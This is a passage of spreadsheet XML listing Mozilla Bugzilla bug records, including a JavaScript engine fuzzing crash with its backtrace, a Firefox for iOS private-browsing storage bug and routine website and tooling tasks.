        </is>
      </c>
      <c r="C5562" t="inlineStr">
        <is>
          <t>Release Notes for 2.16.9</t>
        </is>
      </c>
      <c r="D5562" t="inlineStr">
        <is>
          <t>2005-05-11 00:48:09 -0700</t>
        </is>
      </c>
      <c r="E5562" t="n">
        <v>1</v>
      </c>
      <c r="F5562" t="n">
        <v>1</v>
      </c>
      <c r="G5562" t="n">
        <v>4</v>
      </c>
      <c r="H5562" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5562" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5562" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K5562" t="inlineStr">
        <is>
          <t>2.16.8</t>
        </is>
      </c>
      <c r="L5562" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5562" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5562" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5562" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5562" t="inlineStr"/>
      <c r="Q5562" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5562" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5562" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5562" t="n">
        <v>1</v>
      </c>
      <c r="U5562" t="n">
        <v>0</v>
      </c>
      <c r="V5562" t="n">
        <v>3</v>
      </c>
      <c r="W5562" t="inlineStr">
        <is>
          <t>There will be a security-fix release for 2.16.9, so it needs a Release Notes patch.
I plan to just link to the Security Advisory on bugzilla.org, that's the easiest
thing to do, and it keeps the text of the SecAdv centralized.</t>
        </is>
      </c>
      <c r="X5562" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5563">
      <c r="A5563" t="n">
        <v>1308688</v>
      </c>
      <c r="B5563" t="inlineStr">
        <is>
          <t>2016-10-07 21:22:44 -0700</t>
        </is>
      </c>
      <c r="C5563" t="inlineStr">
        <is>
          <t>Prevent WebExtensions from modifying requests to hosts with mozAddonManager permissions</t>
        </is>
      </c>
      <c r="D5563" t="inlineStr">
        <is>
          <t>2018-06-19 13:04:32 -0700</t>
        </is>
      </c>
      <c r="E5563" t="n">
        <v>1</v>
      </c>
      <c r="F5563" t="n">
        <v>1</v>
      </c>
      <c r="G5563" t="n">
        <v>3</v>
      </c>
      <c r="H5563" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5563" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J5563" t="inlineStr">
        <is>
          <t>Request Handling</t>
        </is>
      </c>
      <c r="K5563" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L5563" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5563" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5563" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5563" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5563" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+] triaged</t>
        </is>
      </c>
      <c r="Q5563" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5563" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5563" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T5563" t="n">
        <v>1</v>
      </c>
      <c r="U5563" t="n">
        <v>0</v>
      </c>
      <c r="V5563" t="n">
        <v>59</v>
      </c>
      <c r="W5563" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1295324 +++
As a follow-up to bug 1295324, we also need to prevent extensions from modifying requests to sites with elevated permissions, since they can gain the same elevated privileges by modifying CSP headers and then redirecting script requests to inject malicious content.</t>
        </is>
      </c>
      <c r="X5563" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5564">
      <c r="A5564" t="n">
        <v>1344334</v>
      </c>
      <c r="B5564" t="inlineStr">
        <is>
          <t>2017-03-03 11:34:30 -0800</t>
        </is>
      </c>
      <c r="C5564" t="inlineStr">
        <is>
          <t>Assertion failure: nslots &gt; 0, at js/src/gc/Nursery.cpp:430 with OOM</t>
        </is>
      </c>
      <c r="D5564" t="inlineStr">
        <is>
          <t>2017-03-09 05:39:19 -0800</t>
        </is>
      </c>
      <c r="E5564" t="n">
        <v>1</v>
      </c>
      <c r="F5564" t="n">
        <v>1</v>
      </c>
      <c r="G5564" t="n">
        <v>3</v>
      </c>
      <c r="H5564" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5564" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5564" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5564" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5564" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5564" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5564" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5564" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5564" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect]</t>
        </is>
      </c>
      <c r="Q5564" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5564" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5564" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5564" t="n">
        <v>1</v>
      </c>
      <c r="U5564" t="n">
        <v>0</v>
      </c>
      <c r="V5564" t="n">
        <v>17</v>
      </c>
      <c r="W5564" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 9732cd019a8b (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-stdcxx-compat --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --baseline-eager):
var lfCodeBuffer = `
  class TestClass {
    constructor() {}
  }
  for (var fun of hasPrototype) {}
`;
if (lfCodeBuffer)
  loadFile(lfCodeBuffer);
function loadFile(lfVarx) {
  lfVarx + "x";
  lfVarx.indexOf("y") === 0;
  oomTest(new Function(lfVarx));
}
Backtrace:
 received signal SIGSEGV, Segmentation fault.
0x0000000000dd0510 in js::Nursery::setSlotsForwardingPointer (nslots=&lt;optimized out&gt;, newSlots=&lt;optimized out&gt;, oldSlots=&lt;optimized out&gt;, this=&lt;optimized out&gt;) at js/src/gc/Nursery.cpp:430
#0  0x0000000000dd0510 in js::Nursery::setSlotsForwardingPointer (nslots=&lt;optimized out&gt;, newSlots=&lt;optimized out&gt;, oldSlots=&lt;optimized out&gt;, this=&lt;optimized out&gt;) at js/src/gc/Nursery.cpp:430
#1  js::TenuringTracer::moveSlotsToTenured (this=0x7fffffffd0b0, dst=0x7ffff468d600, src=0x7ffff47004a0, dstKind=&lt;optimized out&gt;) at js/src/gc/Marking.cpp:2981
#2  0x0000000000dd0c2b in js::TenuringTracer::moveObjectToTenured (this=this@entry=0x7fffffffd0b0, dst=dst@entry=0x7ffff468d600, src=src@entry=0x7ffff47004a0, dstKind=dstKind@entry=js::gc::AllocKind::OBJECT0_BACKGROUND) at js/src/gc/Marking.cpp:2925
#3  0x0000000000dd1491 in js::TenuringTracer::moveToTenured (this=this@entry=0x7fffffffd0b0, src=0x7ffff47004a0) at js/src/gc/Marking.cpp:2793
#4  0x0000000000dd16e7 in js::TenuringTracer::traverse&lt;JSObject&gt; (this=0x7fffffffd0b0, objp=0x7fffffffcee0) at js/src/gc/Marking.cpp:2612
#5  0x0000000000deb35c in js::TenuringTraversalFunctor&lt;JS::Value&gt;::operator()&lt;JSObject&gt; (this=&lt;synthetic pointer&gt;, trc=0x7fffffffd0b0, t=0x7ffff47004a0) at js/src/gc/Marking.cpp:2618
#6  js::DispatchTyped&lt;js::TenuringTraversalFunctor&lt;JS::Value&gt;, js::TenuringTracer*&gt;(js::TenuringTraversalFunctor&lt;JS::Value&gt;, JS::Value const&amp;, js::TenuringTracer*&amp;&amp;) (f=..., val=...) at dist/include/js/Value.h:1440
#7  0x0000000000dd2951 in js::TenuringTracer::traverse&lt;JS::Value&gt; (thingp=0x7ffff694d040, this=0x7fffffffd0b0) at js/src/gc/Marking.cpp:2627
#8  js::TenuringTracer::traceSlots (end=&lt;optimized out&gt;, vp=0x7ffff694d040, this=0x7fffffffd0b0) at js/src/gc/Marking.cpp:2869
#9  js::TenuringTracer::traceObjectSlots (this=this@entry=0x7fffffffd0b0, nobj=nobj@entry=0x7ffff46b3830, start=start@entry=0, length=&lt;optimized out&gt;) at js/src/gc/Marking.cpp:2862
#10 0x0000000000dd2d9c in js::TenuringTracer::traceObject (this=this@entry=0x7fffffffd0b0, obj=obj@entry=0x7ffff46b3830) at js/src/gc/Marking.cpp:2848
#11 0x0000000000dd3271 in js::Nursery::collectToFixedPoint (this=this@entry=0x7ffff6961e18, mover=..., tenureCounts=...) at js/src/gc/Marking.cpp:2809
#12 0x0000000000dd3656 in js::Nursery::doCollection (this=this@entry=0x7ffff6961e18, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME, tenureCounts=...) at js/src/gc/Nursery.cpp:724
#13 0x0000000000dd61a6 in js::Nursery::collect (this=0x7ffff6961e18, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/gc/Nursery.cpp:590
#14 0x000000000097f45e in js::gc::GCRuntime::minorGC (this=0x7ffff695e620, reason=JS::gcreason::DESTROY_RUNTIME, phase=&lt;optimized out&gt;) at js/src/jsgc.cpp:6655
#15 0x00000000009a78d9 in js::gc::GCRuntime::evictNursery (reason=JS::gcreason::DESTROY_RUNTIME, this=&lt;optimized out&gt;) at js/src/gc/GCRuntime.h:1352
#16 js::EvictAllNurseries (reason=JS::gcreason::DESTROY_RUNTIME, rt=&lt;optimized out&gt;) at js/src/gc/Nursery-inl.h:81
#17 js::gc::GCRuntime::gcCycle (this=this@entry=0x7ffff695e620, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/jsgc.cpp:6232
#18 0x00000000009a8338 in js::gc::GCRuntime::collect (this=this@entry=0x7ffff695e620, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/jsgc.cpp:6430
#19 0x00000000009a85b9 in js::gc::GCRuntime::gc (this=this@entry=0x7ffff695e620, gckind=gckind@entry=GC_NORMAL, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/jsgc.cpp:6496
#20 0x0000000000b8bb45 in JSRuntime::destroyRuntime (this=this@entry=0x7ffff695e000) at js/src/vm/Runtime.cpp:308
#21 0x0000000000958fbc in js::DestroyContext (cx=0x7ffff6948000) at js/src/jscntxt.cpp:226
#22 0x00000000004389fc in main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:8455
rax	0x0	0
rbx	0x7ffff47004a0	140737294369952
rcx	0x7ffff6c28a2d	140737333332525
rdx	0x0	0
rsi	0x7ffff6ef7770	140737336276848
rdi	0x7ffff6ef6540	140737336272192
rbp	0x7fffffffcd50	140737488342352
rsp	0x7fffffffcce0	140737488342240
r8	0x7ffff6ef7770	140737336276848
r9	0x7ffff7fe4740	140737354024768
r10	0x58	88
r11	0x7ffff6b9f750	140737332770640
r12	0x0	0
r13	0x7fffffffd0b0	140737488343216
r14	0x7ffff468d600	140737293899264
r15	0x7ffff6997000	140737330638848
rip	0xdd0510 &lt;js::TenuringTracer::moveSlotsToTenured(js::NativeObject*, js::NativeObject*, js::gc::AllocKind)+640&gt;
=&gt; 0xdd0510 &lt;js::TenuringTracer::moveSlotsToTenured(js::NativeObject*, js::NativeObject*, js::gc::AllocKind)+640&gt;:	movl   $0x0,0x0
   0xdd051b &lt;js::TenuringTracer::moveSlotsToTenured(js::NativeObject*, js::NativeObject*, js::gc::AllocKind)+651&gt;:	ud2</t>
        </is>
      </c>
      <c r="X5564" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5565">
      <c r="A5565" t="n">
        <v>1646756</v>
      </c>
      <c r="B5565" t="inlineStr">
        <is>
          <t>2020-06-18 08:23:33 -0700</t>
        </is>
      </c>
      <c r="C5565" t="inlineStr">
        <is>
          <t>Private window in firefox for iOS persists IndexedDB after closing all the tabs</t>
        </is>
      </c>
      <c r="D5565" t="inlineStr">
        <is>
          <t>2020-12-18 17:20:31 -0800</t>
        </is>
      </c>
      <c r="E5565" t="n">
        <v>1</v>
      </c>
      <c r="F5565" t="n">
        <v>1</v>
      </c>
      <c r="G5565" t="n">
        <v>2</v>
      </c>
      <c r="H5565" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5565" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J5565" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5565" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5565" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5565" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N5565" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5565" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5565" t="inlineStr"/>
      <c r="Q5565" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5565" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5565" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5565" t="n">
        <v>1</v>
      </c>
      <c r="U5565" t="n">
        <v>0</v>
      </c>
      <c r="V5565" t="n">
        <v>10</v>
      </c>
      <c r="W5565" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Steps to reproduce:
1. Go to Firefox settings and enable "Close Private tabs when leaving private browsing". 
2. Open a private tab.
3. Open the following page: https://cdn.cliqz.com/browser-f/fun-demo/test-webworker-indexed-db.html, the counter in the section Loading as first-party should increment:
Visit count from worker:
Normal webpage count: 
2. Close the tab + Close the private window.
3. Open the private window again, no previous tabs are there
4. Open the above link again, now  the counters are incremented from where last left off.
5. Even if you press the icon "Clear Tabs", and visit the page again, the counters are not cleared.
Actual results:
It seems that IndexedDB somehow persists, even when private window is closed.
1. This enabled the websites to track the users, across private window sessions.
2. As a Low impact, the history is also retained somewhere on the device, but on mobile devices, disk leaks are hard to exploit.
Expected results:
As a user the expectation was that the on clearing tabs or closing the private window, no data/history is persisted.
Also tried the same with localStorage, and that seems to be cleared as expected.
Tried other browsers like Chrome, Safari, they also seem to behave as expected - closing private window/tabs clears memory.</t>
        </is>
      </c>
      <c r="X5565" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5566">
      <c r="A5566" t="n">
        <v>787561</v>
      </c>
      <c r="B5566" t="inlineStr">
        <is>
          <t>2012-08-31 14:15:26 -0700</t>
        </is>
      </c>
      <c r="C5566" t="inlineStr">
        <is>
          <t>[redesign] Private messaging pages</t>
        </is>
      </c>
      <c r="D5566" t="inlineStr">
        <is>
          <t>2012-09-17 07:18:00 -0700</t>
        </is>
      </c>
      <c r="E5566" t="n">
        <v>1</v>
      </c>
      <c r="F5566" t="n">
        <v>1</v>
      </c>
      <c r="G5566" t="n">
        <v>5</v>
      </c>
      <c r="H5566" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5566" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5566" t="inlineStr">
        <is>
          <t>Users and Groups</t>
        </is>
      </c>
      <c r="K5566" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5566" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5566" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5566" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5566" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5566" t="inlineStr">
        <is>
          <t>u=contributor c=private-messaging p=2</t>
        </is>
      </c>
      <c r="Q5566" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5566" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5566" t="inlineStr">
        <is>
          <t>2012Q3</t>
        </is>
      </c>
      <c r="T5566" t="n">
        <v>1</v>
      </c>
      <c r="U5566" t="n">
        <v>0</v>
      </c>
      <c r="V5566" t="n">
        <v>4</v>
      </c>
      <c r="W5566" t="inlineStr">
        <is>
          <t>Bug 762255 has a mockup of the new inbox.
This bug includes styling the following pages:
/messages
/messages/read/&lt;messageid&gt;
/messages/sent
/messages/new</t>
        </is>
      </c>
      <c r="X5566" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5567">
      <c r="A5567" t="n">
        <v>648347</v>
      </c>
      <c r="B5567" t="inlineStr">
        <is>
          <t>2011-04-07 13:33:48 -0700</t>
        </is>
      </c>
      <c r="C5567" t="inlineStr">
        <is>
          <t>[ReleaseChannels] Add "Future Releases" under desktop header button on Moz.com</t>
        </is>
      </c>
      <c r="D5567" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E5567" t="n">
        <v>1</v>
      </c>
      <c r="F5567" t="n">
        <v>1</v>
      </c>
      <c r="G5567" t="n">
        <v>5</v>
      </c>
      <c r="H5567" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5567" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J5567" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5567" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5567" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5567" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5567" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5567" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5567" t="inlineStr"/>
      <c r="Q5567" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5567" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5567" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T5567" t="n">
        <v>1</v>
      </c>
      <c r="U5567" t="n">
        <v>0</v>
      </c>
      <c r="V5567" t="n">
        <v>10</v>
      </c>
      <c r="W5567" t="inlineStr">
        <is>
          <t>Please add "Future Releases" to the desktop tab on moz.com headers for Phase 2 of this project.
It should link to http://www.mozilla.com/en-US/firefox/channel/</t>
        </is>
      </c>
      <c r="X5567" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5568">
      <c r="A5568" t="n">
        <v>763004</v>
      </c>
      <c r="B5568" t="inlineStr">
        <is>
          <t>2012-06-08 11:58:21 -0700</t>
        </is>
      </c>
      <c r="C5568" t="inlineStr">
        <is>
          <t>nightly balrog updates need to make sure hashFunction exists in the root of the blob</t>
        </is>
      </c>
      <c r="D5568" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E5568" t="n">
        <v>1</v>
      </c>
      <c r="F5568" t="n">
        <v>1</v>
      </c>
      <c r="G5568" t="n">
        <v>5</v>
      </c>
      <c r="H5568" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5568" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5568" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5568" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5568" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5568" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5568" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5568" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5568" t="inlineStr">
        <is>
          <t>[balrog]</t>
        </is>
      </c>
      <c r="Q5568" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5568" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5568" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5568" t="n">
        <v>1</v>
      </c>
      <c r="U5568" t="n">
        <v>0</v>
      </c>
      <c r="V5568" t="n">
        <v>5</v>
      </c>
      <c r="W5568" t="inlineStr">
        <is>
          <t>...otherwise updates don't work. This should be pretty easy now that we have root-level blob updating in the API.</t>
        </is>
      </c>
      <c r="X5568" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5569">
      <c r="A5569" t="n">
        <v>287197</v>
      </c>
      <c r="B5569" t="inlineStr">
        <is>
          <t>2005-03-22 04:01:40 -0800</t>
        </is>
      </c>
      <c r="C5569" t="inlineStr">
        <is>
          <t>comment formatting of os_Linux_ia64.s doesn't work with gcc 3.3.x</t>
        </is>
      </c>
      <c r="D5569" t="inlineStr">
        <is>
          <t>2005-03-22 13:38:19 -0800</t>
        </is>
      </c>
      <c r="E5569" t="n">
        <v>1</v>
      </c>
      <c r="F5569" t="n">
        <v>1</v>
      </c>
      <c r="G5569" t="n">
        <v>3</v>
      </c>
      <c r="H5569" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5569" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J5569" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K5569" t="inlineStr">
        <is>
          <t>4.6</t>
        </is>
      </c>
      <c r="L5569" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5569" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5569" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5569" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5569" t="inlineStr"/>
      <c r="Q5569" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5569" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5569" t="inlineStr">
        <is>
          <t>4.6</t>
        </is>
      </c>
      <c r="T5569" t="n">
        <v>1</v>
      </c>
      <c r="U5569" t="n">
        <v>0</v>
      </c>
      <c r="V5569" t="n">
        <v>5</v>
      </c>
      <c r="W5569" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8b2) Gecko/20050308
Build Identifier: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8b2) Gecko/20050308
comments in os_Linux_ia64.s were changed  a few weeks ago. The change breaks
builds on gcc 3.3.x. Is the change needed for gcc 4? 
Reproducible: Always
Steps to Reproduce:
.
Actual Results:  
os_Linux_ia64.s:41: Error: junk at end of line, first unrecognized character is `/'</t>
        </is>
      </c>
      <c r="X5569" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5570">
      <c r="A5570" t="n">
        <v>1375341</v>
      </c>
      <c r="B5570" t="inlineStr">
        <is>
          <t>2017-06-21 19:09:07 -0700</t>
        </is>
      </c>
      <c r="C5570" t="inlineStr">
        <is>
          <t>Add support for ASan LeakSanitizer bug suggestions</t>
        </is>
      </c>
      <c r="D5570" t="inlineStr">
        <is>
          <t>2017-06-29 17:05:35 -0700</t>
        </is>
      </c>
      <c r="E5570" t="n">
        <v>1</v>
      </c>
      <c r="F5570" t="n">
        <v>1</v>
      </c>
      <c r="G5570" t="n">
        <v>7</v>
      </c>
      <c r="H5570" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5570" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5570" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K5570" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5570" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5570" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5570" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5570" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5570" t="inlineStr"/>
      <c r="Q5570" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5570" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5570" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5570" t="n">
        <v>1</v>
      </c>
      <c r="U5570" t="n">
        <v>0</v>
      </c>
      <c r="V5570" t="n">
        <v>10</v>
      </c>
      <c r="W5570" t="inlineStr">
        <is>
          <t>ASan (LSan, let's call the whole thing off) leak messages are of the form "TEST-UNEXPECTED-FAIL | LeakSanitizer | leak at Object1, Object2, Object3".
For an astonishingly long time, we apparently got away with (if you ignore massive misstarring) treating that as a failure in the test with the filename LeakSanitizer, and suggesting every open bug in that test filename.
Then recently we got a rash of new leaks, which have driven us up well over 20 kw:intermittent-failure LeakSanitzer results, so now they all have the suggestion "Exceeded max (20) bug suggestions, most of which are likely false positives."
For non-LSan, leak failure messages are of the form "leakcheck | .*\d+ bytes leaked (Object-1, Object-2, Object-3, ...)" and we have a regex to make anything matching \d+ bytes leaked \(.+\) search for the stuff in the parens in https://github.com/mozilla/treeherder/blob/37cf7fa970a0d641b4b6cae58b123db85e67ec52/treeherder/model/error_summary.py#L107.
We can't exactly do that, since that's already a bit sketchy, not checking for the filename leakcheck before matching, and matching any summary including "leak at" would be far too sketchy, but in the same neighborhood we could reasonably check for test_name_or_path == "LeakSanitizer" and then set search_term to a match on leak at (.+).</t>
        </is>
      </c>
      <c r="X5570" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5571">
      <c r="A5571" t="n">
        <v>1174645</v>
      </c>
      <c r="B5571" t="inlineStr">
        <is>
          <t>2015-06-15 01:36:45 -0700</t>
        </is>
      </c>
      <c r="C5571" t="inlineStr">
        <is>
          <t>Jobs with missing logs incorrectly say " Log parsing complete. Generating bug suggestions The content of this panel will refresh in 5 seconds."</t>
        </is>
      </c>
      <c r="D5571" t="inlineStr">
        <is>
          <t>2015-10-02 11:28:26 -0700</t>
        </is>
      </c>
      <c r="E5571" t="n">
        <v>1</v>
      </c>
      <c r="F5571" t="n">
        <v>1</v>
      </c>
      <c r="G5571" t="n">
        <v>7</v>
      </c>
      <c r="H5571" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5571" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5571" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5571" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5571" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5571" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5571" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5571" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5571" t="inlineStr"/>
      <c r="Q5571" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5571" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5571" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5571" t="n">
        <v>1</v>
      </c>
      <c r="U5571" t="n">
        <v>0</v>
      </c>
      <c r="V5571" t="n">
        <v>16</v>
      </c>
      <c r="W5571" t="inlineStr">
        <is>
          <t>See jobs in:
https://treeherder.mozilla.org/#/jobs?repo=mozilla-inbound&amp;revision=4edd6b30d540&amp;filter-searchStr=b2g%20desktop&amp;filter-resultStatus=retry</t>
        </is>
      </c>
      <c r="X5571" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5572">
      <c r="A5572" t="n">
        <v>1023158</v>
      </c>
      <c r="B5572" t="inlineStr">
        <is>
          <t>2014-06-10 03:17:15 -0700</t>
        </is>
      </c>
      <c r="C5572" t="inlineStr">
        <is>
          <t>Assertion failure: ptr-&gt;isTenured(), at jit/shared/Assembler-shared.h:203 with asm.js</t>
        </is>
      </c>
      <c r="D5572" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:54 -0700</t>
        </is>
      </c>
      <c r="E5572" t="n">
        <v>1</v>
      </c>
      <c r="F5572" t="n">
        <v>1</v>
      </c>
